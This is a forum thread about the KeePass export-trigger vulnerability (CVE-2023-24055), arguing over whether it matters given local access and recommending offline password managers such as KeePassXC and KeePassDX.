A good offline password manager recommendation

Hello!
I have been using Keepassxc and keepassdx on my pc and android respectively. But after reading about the vulnerability in keepass, and their devs refusing to fix or acknowledge it, I am looking for a good alternative. Nothing fancy, just a good, simple and secure password manager.
Thank you!

or

?

can you please delete this thread? turns out only keepass vanilla is affected. xc and dx are fine…

1 Like

We can keep this, maybe others like the info.

ref: https://nvd.nist.gov/vuln/detail/CVE-2023-24055

That’s not what’s happening though. The developers pointed out how the vulnerability is not within scope because it requires access to the computer in question and if you have access to the computer you can do much worse things like run a keylogger and thus fixing the “vulnerability” won’t actually improve security in any way but it will mean that people can’t make automatic backups of their Keepass database anymore.

They also explicitly named a workaround in the very first reply: https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/#1914. And they linked to more details here: https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/#913a.

People also point out you can force-override this config as admin user: KeePass / Discussion / Open Discussion: someone can read the passwords using export trigger

And it only relates to the original Keepass on the desktop anyway, it’s not a database format issue or anything, it may not even apply to KeepassXC or KeepassDX (you should do your own research to see if they offer similar features and let you disable it if you are truly worried about someone on your computer editing your Keepass config file but also not just installing a keylogger)

Edit: I see now you mentioned it only affects Vanilla, I missed that.

4 Likes

This is a very bad take. Security and privacy are not an on and off switch. If you think preventing access to your computer is the only security defense, I think you are mistaken. There are layers to security. Why use a password manager at all then? Just paste your passwords in a clear text file if you think the only defense should be access to computer.

That’s not what’s happening though. The developers pointed out how the vulnerability is not within scope

The database, a password manager is supposed to secure, is not within scope? WOW.

Not at all true, and as a password manager, their only duty is to focus on the security of their software, not my overall security, which is my responsibility. This is basic UNIX philosophy.

And all the workarounds don’t matter, as software should be secure by default, especially when its their only selling point.

1 Like

Great, so once the attacker is in and installs a key logger, what’s the defence (assuming the database is encrypted)?

1 Like

well if the database is encrypted properly, with a good master password, they wont be able to get all my passwords…

Ok, they only get your master password when you type it, right? Then they exfiltrate the database… and decrypt at their leisure, yes?

1 Like

Bruh you are assuming a lot of things, like the attacker is very sophisticated, is targeting me, I allow open ports, etc…
Most people getting hacked are not targeted, and are mostly attacked by scripts. Most people who use offline password managers also manage their own backup. Either online or offline, or both. So if I upload my database “not knowing it has vulnerability” to a cloud provider, which get compromised, all my passwords are compromised too. If I store it on an unencrypted sdcard, (thinking I dont need to encrypt my sdcard as it only has my passwords, which are encrypted) and it gets lost or stolen.
Does f-droid store my password in plain text? According to the attitudes of mods here, seems so…

Saying that they can plant a keylog, I can also say remove password from your pc, as, if someone can enter your house, they can plant a hidden camera, or a physical logger. That is what i meant by layers.

The whole reason a password manager exists:

  1. to generate difficult to guess passwords with high entropy.
  2. store it securely.
    If you think encryption here doesnt matter, then why use password managers at all?

Wasn’t this the whole idea? Didn’t you say it was about layers? The “vulnerability” is real ONLY if that assumption is true… if it’s not then there’s no vuln to talk about.

They can store it as securely as the rest of the system, yes. The extra encryption might help or be easily avoidable, depending on “threat model”.

Wasn’t this the whole idea?

bruh did you even read what I said above? If the password is stored safely, most people wont be affected as most attacks are not targeted nor sophisticated.

Didn’t you say it was about layers?

exactly, thats why I want my passwords to be encrypted. It an an additional layer of security.

The “vulnerability” is real ONLY if that assumption is true… if it’s not then there’s no vuln to talk about.

Today yes. 2 weeks ago, there was no known threat. a week ago, this was. Tomorrow, just the file might be enough. Thats the whole point. There is a function in the software that can spill passwords via plain text. Keepassxc’s and dx’s dev saw this as a problem, and removed it, as this is unwanted, unnecessary and dangerous function.

They can store it as securely as the rest of the system, yes.

You cant even compare the attack surface of a operating system and just a software in it. It is dumb to rely solely on the security of an operating system which has millions upon millions of lines of code.

The extra encryption might help or be easily avoidable, depending on “threat model”.

Exactly. My threat model requires a safe and secure password manager. Its the devs only job. Being a password manager dev, being responsible for encrypting my database properly, and then when alerted about the issue, saying to secure my pc, instead of fixing the issue is dumb.

Doesn’t matter, I use xc and dx as they follow unix philosophy. they are not affected. just delete my account from this forum as for some reason, there is no option to do that. I suspect that’s against GDPR…

1 Like

Discourse is odd indeed.

Would you like to be anonymized (posts stay but username is random)?

sure.
post must be 10 characters post must be 10 characters

Done :slight_smile: :slight_smile:

I think Enpass, Zero and One Key is not bad. They are offline password managers.
They have wonderful features but not for free…

It would be great if you guys had found a free one. Please share it with me. Thanks in advance.

Keepass, keepassxc and many are free and offline.

Just remebered this one: Lain - Minimal, secure & portable password manager.

This is for PC, Windows though.